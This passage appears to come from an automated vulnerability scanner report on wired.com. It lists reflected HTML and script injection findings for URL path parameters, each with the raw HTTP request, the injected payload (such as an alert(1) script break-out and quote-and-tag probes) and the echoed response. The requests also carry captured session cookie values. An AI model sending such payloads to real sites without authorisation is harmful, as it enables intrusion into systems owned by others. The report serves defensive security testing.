Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:21:40 GMT
Date: Sun, 21 Nov 2010 23:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script>
...[SNIP]...

1.597. http://www.wired.com/medtech [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29378
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:03 GMT
Date: Mon, 22 Nov 2010 01:11:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech8e89c"><a>d3ad9ae676c">
...[SNIP]...

1.598. http://www.wired.com/medtech/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech41041"><a>c86672fee37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29379
Vary: Accept-Encoding
Cache-Control: max-age=220
Expires: Sun, 21 Nov 2010 20:19:52 GMT
Date: Sun, 21 Nov 2010 20:16:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech41041"><a>c86672fee37">
...[SNIP]...

1.599. http://www.wired.com/medtech/drugs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs">
...[SNIP]...

1.600. http://www.wired.com/medtech/drugs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/drugs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29393
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:08 GMT
Date: Sun, 21 Nov 2010 23:09:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b">
...[SNIP]...

1.601. http://www.wired.com/medtech/genetics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtecha6e54"><a>33024249170 ss_genetics">
...[SNIP]...

1.602. http://www.wired.com/medtech/genetics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/genetics

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29399
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:15 GMT
Date: Sun, 21 Nov 2010 23:09:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b">
...[SNIP]...

1.603. http://www.wired.com/medtech/health [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medteche0876"><a>211d7d736ef/health HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:41 GMT
Date: Sun, 21 Nov 2010 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medteche0876"><a>211d7d736ef ss_health">
...[SNIP]...

1.604. http://www.wired.com/medtech/health [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/health

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29395
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:09:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_healthed9f9"><a>5052cbc9d21">
...[SNIP]...

1.605. http://www.wired.com/medtech/stemcells [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:48 GMT
Date: Sun, 21 Nov 2010 23:08:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells">
...[SNIP]...

1.606. http://www.wired.com/medtech/stemcells [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /medtech/stemcells

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:21 GMT
Date: Sun, 21 Nov 2010 23:09:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d">
...[SNIP]...

1.607. http://www.wired.com/multimedia [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29268
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:57 GMT
Date: Mon, 22 Nov 2010 01:11:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_multimediaaf2cd"><a>0b4232b1240">
...[SNIP]...

1.608. http://www.wired.com/multimedia/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /multimedia/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1b5"><a>d5da876dbe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /multimedia3e1b5"><a>d5da876dbe0/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29269
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Sun, 21 Nov 2010 20:19:58 GMT
Date: Sun, 21 Nov 2010 20:16:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_multimedia3e1b5"><a>d5da876dbe0">
...[SNIP]...

1.609. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:21:53 GMT
Date: Mon, 22 Nov 2010 01:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01">
...[SNIP]...

1.610. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:18 GMT
Date: Mon, 22 Nov 2010 01:12:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561">
...[SNIP]...

1.611. http://www.wired.com/politics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=239
Expires: Mon, 22 Nov 2010 01:15:40 GMT
Date: Mon, 22 Nov 2010 01:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politicsc427d"><a>e6d5b4a7516">
...[SNIP]...

1.612. http://www.wired.com/politics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29300
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 20:20:15 GMT
Date: Sun, 21 Nov 2010 20:16:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics70abd"><a>9d24c849cc4">
...[SNIP]...

1.613. http://www.wired.com/politics/law [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics209da"><a>9d347d00209/law HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
